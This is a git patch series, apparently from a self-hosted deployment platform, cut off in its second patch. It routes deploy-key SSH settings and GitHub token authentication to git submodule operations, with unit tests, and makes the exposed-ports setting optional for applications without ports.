From dcd976ae065e1a2a003f62a12b29e49e41ac157e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 11:30:58 +0100
Subject: [PATCH 01/90] fix(git): ensure ssh credentials are propagated to
 submodule operations

- Add gitSshCommand parameter to setGitImportSettings and buildGitCheckoutCommand
- Extract hardcoded ssh commands to variables for consistency
- Apply custom ssh credentials to all git operations including submodule sync/update
- Configure git url rewriting for github token-based authentication with submodules
- Add comprehensive test suite for submodule credential propagation
---
 app/Models/Application.php                |  41 +++++---
 openapi.json                              |  27 +++++
 openapi.yaml                              |  21 ++++
 tests/Unit/GitSubmoduleCredentialTest.php | 122 ++++++++++++++++++++++
 4 files changed, 196 insertions(+), 15 deletions(-)
 create mode 100644 tests/Unit/GitSubmoduleCredentialTest.php

diff --git a/app/Models/Application.php b/app/Models/Application.php
index 34ab4141e..e622c9d54 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -1087,12 +1087,14 @@ public function dirOnServer()
         return application_configuration_dir()."/{$this->uuid}";
     }
 
-    public function setGitImportSettings(string $deployment_uuid, string $git_clone_command, bool $public = false, ?string $commit = null)
+    public function setGitImportSettings(string $deployment_uuid, string $git_clone_command, bool $public = false, ?string $commit = null, ?string $gitSshCommand = null)
     {
         $baseDir = $this->generateBaseDir($deployment_uuid);
         $escapedBaseDir = escapeshellarg($baseDir);
         $isShallowCloneEnabled = $this->settings?->is_git_shallow_clone_enabled ?? false;
 
+        $sshCommand = $gitSshCommand ?? 'ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null';
+
         // Use the explicitly passed commit (e.g. from rollback), falling back to the application's git_commit_sha.
         // Invalid refs will cause the git checkout/fetch command to fail on the remote server.
         $commitToUse = $commit ?? $this->git_commit_sha;
@@ -1102,9 +1104,9 @@ public function setGitImportSettings(string $deployment_uuid, string $git_clone_
             // If shallow clone is enabled and we need a specific commit,
             // we need to fetch that specific commit with depth=1
             if ($isShallowCloneEnabled) {
-                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git fetch --depth=1 origin {$escapedCommit} && git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
+                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$sshCommand}\" git fetch --depth=1 origin {$escapedCommit} && git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
             } else {
-                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
+                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$sshCommand}\" git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
             }
         }
         if ($this->settings->is_git_submodules_enabled) {
@@ -1115,10 +1117,10 @@ public function setGitImportSettings(string $deployment_uuid, string $git_clone_
             }
             // Add shallow submodules flag if shallow clone is enabled
             $submoduleFlags = $isShallowCloneEnabled ? '--depth=1' : '';
-            $git_clone_command = "{$git_clone_command} git submodule sync && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git submodule update --init --recursive {$submoduleFlags}; fi";
+            $git_clone_command = "{$git_clone_command} git submodule sync && GIT_SSH_COMMAND=\"{$sshCommand}\" git submodule update --init --recursive {$submoduleFlags}; fi";
         }
         if ($this->settings->is_git_lfs_enabled) {
-            $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git lfs pull";
+            $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$sshCommand}\" git lfs pull";
         }
 
         return $git_clone_command;
@@ -1301,12 +1303,18 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     }
                 } else {
                     $github_access_token = generateGithubInstallationToken($this->source);
+                    // Configure git to rewrite URLs with the token so submodules on the same host authenticate correctly
+                    $escapedTokenUrl = escapeshellarg("{$source_html_url_scheme}://x-access-token:{$github_access_token}@{$source_html_url_host}/");
+                    $escapedHostUrl = escapeshellarg("{$source_html_url_scheme}://{$source_html_url_host}/");
+                    $gitConfigCommand = "git config --global url.{$escapedTokenUrl}.insteadOf {$escapedHostUrl}";
                     if ($exec_in_docker) {
+                        $commands->push(executeInDocker($deployment_uuid, $gitConfigCommand));
                         $repoUrl = "$source_html_url_scheme://x-access-token:$github_access_token@$source_html_url_host/{$customRepository}.git";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $git_clone_command = "{$git_clone_command} {$escapedRepoUrl} {$escapedBaseDir}";
                         $fullRepoUrl = $repoUrl;
                     } else {
+                        $commands->push($gitConfigCommand);
                         $repoUrl = "$source_html_url_scheme://x-access-token:$github_access_token@$source_html_url_host/{$customRepository}";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $git_clone_command = "{$git_clone_command} {$escapedRepoUrl} {$escapedBaseDir}";
@@ -1348,11 +1356,12 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
             }
             $private_key = base64_encode($private_key);
             $escapedCustomRepository = escapeshellarg($customRepository);
-            $git_clone_command_base = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
+            $deployKeySshCommand = "ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa";
+            $git_clone_command_base = "GIT_SSH_COMMAND=\"{$deployKeySshCommand}\" {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
             if ($only_checkout) {
                 $git_clone_command = $git_clone_command_base;
             } else {
-                $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit);
+                $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit, gitSshCommand: $deployKeySshCommand);
             }
             if ($exec_in_docker) {
                 $commands = collect([
@@ -1375,7 +1384,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     } else {
                         $commands->push("echo 'Checking out $branch'");
                     }
-                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name);
+                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$deployKeySshCommand}\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name, $deployKeySshCommand);
                 } elseif ($git_type === 'github' || $git_type === 'gitea') {
                     $branch = "pull/{$pull_request_id}/head:$pr_branch_name";
                     if ($exec_in_docker) {
@@ -1383,14 +1392,14 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     } else {
                         $commands->push("echo 'Checking out $branch'");
                     }
-                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name);
+                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$deployKeySshCommand}\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name, $deployKeySshCommand);
                 } elseif ($git_type === 'bitbucket') {
                     if ($exec_in_docker) {
                         $commands->push(executeInDocker($deployment_uuid, "echo 'Checking out $branch'"));
                     } else {
                         $commands->push("echo 'Checking out $branch'");
                     }
-                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" ".$this->buildGitCheckoutCommand($commit);
+                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$deployKeySshCommand}\" ".$this->buildGitCheckoutCommand($commit, $deployKeySshCommand);
                 }
             }
 
@@ -1411,6 +1420,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
             $escapedCustomRepository = escapeshellarg($customRepository);
             $git_clone_command = "{$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
             $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command, public: true, commit: $commit);
+            $otherSshCommand = "ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa";
 
             if ($pull_request_id !== 0) {
                 if ($git_type === 'gitlab') {
@@ -1420,7 +1430,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     } else {
                         $commands->push("echo 'Checking out $branch'");
                     }
-                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name);
+                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$otherSshCommand}\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name, $otherSshCommand);
                 } elseif ($git_type === 'github' || $git_type === 'gitea') {
                     $branch = "pull/{$pull_request_id}/head:$pr_branch_name";
                     if ($exec_in_docker) {
@@ -1428,14 +1438,14 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     } else {
                         $commands->push("echo 'Checking out $branch'");
                     }
-                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name);
+                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$otherSshCommand}\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name, $otherSshCommand);
                 } elseif ($git_type === 'bitbucket') {
                     if ($exec_in_docker) {
                         $commands->push(executeInDocker($deployment_uuid, "echo 'Checking out $branch'"));
                     } else {
                         $commands->push("echo 'Checking out $branch'");
                     }
-                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" ".$this->buildGitCheckoutCommand($commit);
+                    $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"{$otherSshCommand}\" ".$this->buildGitCheckoutCommand($commit, $otherSshCommand);
                 }
             }
 
@@ -1684,13 +1694,14 @@ public function fqdns(): Attribute
         );
     }
 
-    protected function buildGitCheckoutCommand($target): string
+    protected function buildGitCheckoutCommand($target, ?string $gitSshCommand = null): string
     {
         $escapedTarget = escapeshellarg($target);
         $command = "git checkout {$escapedTarget}";
 
         if ($this->settings->is_git_submodules_enabled) {
-            $command .= ' && git submodule update --init --recursive';
+            $sshCommand = $gitSshCommand ?? 'ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null';
+            $command .= " && GIT_SSH_COMMAND=\"{$sshCommand}\" git submodule update --init --recursive";
         }
 
         return $command;
diff --git a/openapi.json b/openapi.json
index 69f5ef53d..849dee363 100644
--- a/openapi.json
+++ b/openapi.json
@@ -3339,6 +3339,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
@@ -5864,6 +5873,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
@@ -10561,6 +10579,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
diff --git a/openapi.yaml b/openapi.yaml
index fab3df54e..226295cdb 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2111,6 +2111,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop application.'
@@ -3806,6 +3813,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop database.'
@@ -6645,6 +6659,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop service.'
diff --git a/tests/Unit/GitSubmoduleCredentialTest.php b/tests/Unit/GitSubmoduleCredentialTest.php
new file mode 100644
index 000000000..1adaf735f
--- /dev/null
+++ b/tests/Unit/GitSubmoduleCredentialTest.php
@@ -0,0 +1,122 @@
+<?php
+
+use App\Models\Application;
+use App\Models\ApplicationSetting;
+
+describe('Git submodule credential propagation', function () {
+    beforeEach(function () {
+        $this->application = new Application;
+        $this->application->forceFill([
+            'uuid' => 'test-app-uuid',
+            'git_commit_sha' => 'HEAD',
+        ]);
+
+        $settings = new ApplicationSetting;
+        $settings->is_git_shallow_clone_enabled = false;
+        $settings->is_git_submodules_enabled = true;
+        $settings->is_git_lfs_enabled = false;
+        $this->application->setRelation('settings', $settings);
+    });
+
+    test('setGitImportSettings uses provided gitSshCommand for submodule update', function () {
+        $sshCommand = 'ssh -o ConnectTimeout=30 -p 22 -o Port=22 -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa';
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            public: false,
+            gitSshCommand: $sshCommand
+        );
+
+        expect($result)
+            ->toContain('GIT_SSH_COMMAND="'.$sshCommand.'" git submodule update --init --recursive')
+            ->toContain('git submodule sync');
+    });
+
+    test('setGitImportSettings uses default ssh command when no gitSshCommand provided', function () {
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            public: false,
+        );
+
+        expect($result)
+            ->toContain('GIT_SSH_COMMAND="ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null" git submodule update --init --recursive');
+    });
+
+    test('setGitImportSettings uses provided gitSshCommand for fetch and checkout', function () {
+        $this->application->git_commit_sha = 'abc123def456';
+        $sshCommand = 'ssh -o ConnectTimeout=30 -p 22 -o Port=22 -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa';
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            public: false,
+            gitSshCommand: $sshCommand
+        );
+
+        expect($result)
+            ->toContain('GIT_SSH_COMMAND="'.$sshCommand.'" git -c advice.detachedHead=false checkout');
+    });
+
+    test('setGitImportSettings uses provided gitSshCommand for shallow fetch', function () {
+        $this->application->git_commit_sha = 'abc123def456';
+        $this->application->settings->is_git_shallow_clone_enabled = true;
+        $sshCommand = 'ssh -o ConnectTimeout=30 -p 22 -o Port=22 -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa';
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            public: false,
+            gitSshCommand: $sshCommand
+        );
+
+        expect($result)
+            ->toContain('GIT_SSH_COMMAND="'.$sshCommand.'" git fetch --depth=1 origin');
+    });
+
+    test('setGitImportSettings uses provided gitSshCommand for lfs pull', function () {
+        $this->application->settings->is_git_lfs_enabled = true;
+        $sshCommand = 'ssh -o ConnectTimeout=30 -p 22 -i /root/.ssh/id_rsa';
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            public: false,
+            gitSshCommand: $sshCommand
+        );
+
+        expect($result)
+            ->toContain('GIT_SSH_COMMAND="'.$sshCommand.'" git lfs pull');
+    });
+
+    test('buildGitCheckoutCommand includes GIT_SSH_COMMAND for submodule update when provided', function () {
+        $sshCommand = 'ssh -o ConnectTimeout=30 -p 22 -i /root/.ssh/id_rsa';
+
+        $method = new ReflectionMethod($this->application, 'buildGitCheckoutCommand');
+        $result = $method->invoke($this->application, 'main', $sshCommand);
+
+        expect($result)
+            ->toContain("git checkout 'main'")
+            ->toContain('GIT_SSH_COMMAND="'.$sshCommand.'" git submodule update --init --recursive');
+    });
+
+    test('buildGitCheckoutCommand uses default ssh command for submodule update when none provided', function () {
+        $method = new ReflectionMethod($this->application, 'buildGitCheckoutCommand');
+        $result = $method->invoke($this->application, 'main');
+
+        expect($result)
+            ->toContain('GIT_SSH_COMMAND="ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null" git submodule update --init --recursive');
+    });
+
+    test('buildGitCheckoutCommand omits submodule update when submodules disabled', function () {
+        $this->application->settings->is_git_submodules_enabled = false;
+
+        $method = new ReflectionMethod($this->application, 'buildGitCheckoutCommand');
+        $result = $method->invoke($this->application, 'main');
+
+        expect($result)
+            ->toContain("git checkout 'main'")
+            ->not->toContain('submodule');
+    });
+});

From 9c8e5645b42703e2b56c31dd6c9a29c8d3a90d6b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Thu, 26 Mar 2026 13:20:41 +0530
Subject: [PATCH 02/90] feat(application): make ports_exposes optional for
 portless apps

---
 .../Api/ApplicationsController.php            | 16 ++++-----
 app/Jobs/ApplicationDeploymentJob.php         | 33 +++++++++++--------
 app/Livewire/Project/Application/General.php  |  3 +-
 app/Models/Application.php                    |  2 +-
 ...exposes_nullable_in_applications_table.php | 22 +++++++++++++
 .../project/application/general.blade.php     |  9 ++++-
 6 files changed, 60 insertions(+), 25 deletions(-)
 create mode 100644 database/migrations/2026_03_26_000000_make_ports_exposes_nullable_in_applications_table.php

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 66f6a1ef8..6b57d8f5f 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -144,7 +144,7 @@ public function applications(Request $request)
                     mediaType: 'application/json',
                     schema: new OA\Schema(
                         type: 'object',
-                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'git_repository', 'git_branch', 'build_pack', 'ports_exposes'],
+                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'git_repository', 'git_branch', 'build_pack'],
                         properties: [
                             'project_uuid' => ['type' => 'string', 'description' => 'The project UUID.'],
                             'server_uuid' => ['type' => 'string', 'description' => 'The server UUID.'],
@@ -309,7 +309,7 @@ public function create_public_application(Request $request)
                     mediaType: 'application/json',
                     schema: new OA\Schema(
                         type: 'object',
-                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'github_app_uuid', 'git_repository', 'git_branch', 'build_pack', 'ports_exposes'],
+                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'github_app_uuid', 'git_repository', 'git_branch', 'build_pack'],
                         properties: [
                             'project_uuid' => ['type' => 'string', 'description' => 'The project UUID.'],
                             'server_uuid' => ['type' => 'string', 'description' => 'The server UUID.'],
@@ -474,7 +474,7 @@ public function create_private_gh_app_application(Request $request)
                     mediaType: 'application/json',
                     schema: new OA\Schema(
                         type: 'object',
-                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'private_key_uuid', 'git_repository', 'git_branch', 'build_pack', 'ports_exposes'],
+                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'private_key_uuid', 'git_repository', 'git_branch', 'build_pack'],
                         properties: [
                             'project_uuid' => ['type' => 'string', 'description' => 'The project UUID.'],
                             'server_uuid' => ['type' => 'string', 'description' => 'The server UUID.'],
@@ -776,7 +776,7 @@ public function create_dockerfile_application(Request $request)
                     mediaType: 'application/json',
                     schema: new OA\Schema(
                         type: 'object',
-                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'docker_registry_image_name', 'ports_exposes'],
+                        required: ['project_uuid', 'server_uuid', 'environment_name', 'environment_uuid', 'docker_registry_image_name'],
                         properties: [
                             'project_uuid' => ['type' => 'string', 'description' => 'The project UUID.'],
                             'server_uuid' => ['type' => 'string', 'description' => 'The server UUID.'],
@@ -1114,7 +1114,7 @@ private function create_application(Request $request, $type)
                 'git_repository' => ['string', 'required', new ValidGitRepositoryUrl],
                 'git_branch' => ['string', 'required', new ValidGitBranch],
                 'build_pack' => ['required', Rule::enum(BuildPackTypes::class)],
-                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|required',
+                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|nullable',
                 'docker_compose_domains' => 'array|nullable',
                 'docker_compose_domains.*' => 'array:name,domain',
                 'docker_compose_domains.*.name' => 'string|required',
@@ -1307,7 +1307,7 @@ private function create_application(Request $request, $type)
                 'git_repository' => 'string|required',
                 'git_branch' => ['string', 'required', new ValidGitBranch],
                 'build_pack' => ['required', Rule::enum(BuildPackTypes::class)],
-                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|required',
+                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|nullable',
                 'github_app_uuid' => 'string|required',
                 'watch_paths' => 'string|nullable',
                 'docker_compose_domains' => 'array|nullable',
@@ -1534,7 +1534,7 @@ private function create_application(Request $request, $type)
                 'git_repository' => ['string', 'required', new ValidGitRepositoryUrl],
                 'git_branch' => ['string', 'required', new ValidGitBranch],
                 'build_pack' => ['required', Rule::enum(BuildPackTypes::class)],
-                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|required',
+                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|nullable',
                 'private_key_uuid' => 'string|required',
                 'watch_paths' => 'string|nullable',
                 'docker_compose_domains' => 'array|nullable',
@@ -1835,7 +1835,7 @@ private function create_application(Request $request, $type)
             $validationRules = [
                 'docker_registry_image_name' => 'string|required',
                 'docker_registry_image_tag' => 'string',
-                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|required',
+                'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|nullable',
             ];
             $validationRules = array_merge(sharedDataApplications(), $validationRules);
             $validator = customApiValidator($request->all(), $validationRules);
diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 785e8c8e3..41eb81453 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -1282,7 +1282,7 @@ private function generate_runtime_environment_variables()
 
             // Add PORT if not exists, use the first port as default
             if ($this->build_pack !== 'dockercompose') {
-                if ($this->application->environment_variables->where('key', 'PORT')->isEmpty()) {
+                if ($this->application->environment_variables->where('key', 'PORT')->isEmpty() && ! empty($ports)) {
                     $envs->push("PORT={$ports[0]}");
                 }
             }
@@ -2585,7 +2585,7 @@ private function generate_compose_file()
                     'image' => $this->production_image_name,
                     'container_name' => $this->container_name,
                     'restart' => RESTART_MODE,
-                    'expose' => $ports,
+                    ...(!empty($ports) ? ['expose' => $ports] : []),
                     'networks' => [
                         $this->destination->network => [
                             'aliases' => array_merge(
@@ -2617,16 +2617,19 @@ private function generate_compose_file()
         // If custom_healthcheck_found is true, the Dockerfile's HEALTHCHECK will be used
         // If healthcheck is disabled, no healthcheck will be added
         if (! $this->application->custom_healthcheck_found && ! $this->application->isHealthcheckDisabled()) {
-            $docker_compose['services'][$this->container_name]['healthcheck'] = [
-                'test' => [
-                    'CMD-SHELL',
-                    $this->generate_healthcheck_commands(),
-                ],
-                'interval' => $this->application->health_check_interval.'s',
-                'timeout' => $this->application->health_check_timeout.'s',
-                'retries' => $this->application->health_check_retries,
-                'start_period' => $this->application->health_check_start_period.'s',
-            ];
+            $healthcheck_command = $this->generate_healthcheck_commands();
+            if ($healthcheck_command !== null) {
+                $docker_compose['services'][$this->container_name]['healthcheck'] = [
+                    'test' => [
+                        'CMD-SHELL',
+                        $healthcheck_command,
+                    ],
+                    'interval' => $this->application->health_check_interval.'s',
+                    'timeout' => $this->application->health_check_timeout.'s',
+                    'retries' => $this->application->health_check_retries,
+                    'start_period' => $this->application->health_check_start_period.'s',
+                ];
+            }
         }
 
         if (! is_null($this->application->limits_cpuset)) {
@@ -2836,7 +2839,11 @@ private function generate_healthcheck_commands()
 
         // HTTP type healthcheck (default)
         if (! $this->application->health_check_port) {
-            $health_check_port = (int) $this->application->ports_exposes_array[0];
+            if (! empty($this->application->ports_exposes_array)) {
+                $health_check_port = (int) $this->application->ports_exposes_array[0];
+            } else {
+                return null;
+            }
         } else {
             $health_check_port = (int) $this->application->health_check_port;
         }
diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index 5c186af70..885c9dbac 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -153,7 +153,7 @@ protected function rules(): array
             'staticImage' => 'required',
             'baseDirectory' => array_merge(['required'], array_slice(ValidationPatterns::directoryPathRules(), 1)),
             'publishDirectory' => ValidationPatterns::directoryPathRules(),
-            'portsExposes' => 'required',
+            'portsExposes' => 'nullable',
             'portsMappings' => 'nullable',
             'customNetworkAliases' => 'nullable',
             'dockerfile' => 'nullable',
@@ -208,7 +208,6 @@ protected function messages(): array
                 'buildPack.required' => 'The Build Pack field is required.',
                 'staticImage.required' => 'The Static Image field is required.',
                 'baseDirectory.required' => 'The Base Directory field is required.',
-                'portsExposes.required' => 'The Exposed Ports field is required.',
                 'isStatic.required' => 'The Static setting is required.',
                 'isStatic.boolean' => 'The Static setting must be true or false.',
                 'isSpa.required' => 'The SPA setting is required.',
diff --git a/app/Models/Application.php b/app/Models/Application.php
index 4cc2dcf74..75b81920d 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -2147,7 +2147,7 @@ public function setConfig($config)
             'config.build_pack' => 'required|string',
             'config.base_directory' => 'required|string',
             'config.publish_directory' => 'required|string',
-            'config.ports_exposes' => 'required|string',
+            'config.ports_exposes' => 'nullable|string',
             'config.settings.is_static' => 'required|boolean',
         ]);
         if ($deepValidator->fails()) {
diff --git a/database/migrations/2026_03_26_000000_make_ports_exposes_nullable_in_applications_table.php b/database/migrations/2026_03_26_000000_make_ports_exposes_nullable_in_applications_table.php
new file mode 100644
index 000000000..ac7b5cb55
--- /dev/null
+++ b/database/migrations/2026_03_26_000000_make_ports_exposes_nullable_in_applications_table.php
@@ -0,0 +1,22 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration
+{
+    public function up(): void
+    {
+        Schema::table('applications', function (Blueprint $table) {
+            $table->string('ports_exposes')->nullable()->change();
+        });
+    }
+
+    public function down(): void
+    {
+        Schema::table('applications', function (Blueprint $table) {
+            $table->string('ports_exposes')->nullable(false)->default('')->change();
+        });
+    }
+};
diff --git a/resources/views/livewire/project/application/general.blade.php b/resources/views/livewire/project/application/general.blade.php
index d743e346e..9539f47dc 100644
--- a/resources/views/livewire/project/application/general.blade.php
+++ b/resources/views/livewire/project/application/general.blade.php
@@ -492,6 +492,13 @@ class="flex items-start gap-2 p-4 mb-4 text-sm rounded-lg bg-blue-50 dark:bg-blu
                         </div>
                     @endif
                 @endif
+                @if (empty($portsExposes) || $portsExposes === '0')
+                    <x-callout type="info" title="No ports exposed" class="mb-4">
+                        This application does not expose any ports and will not be reachable through the proxy or your domains.
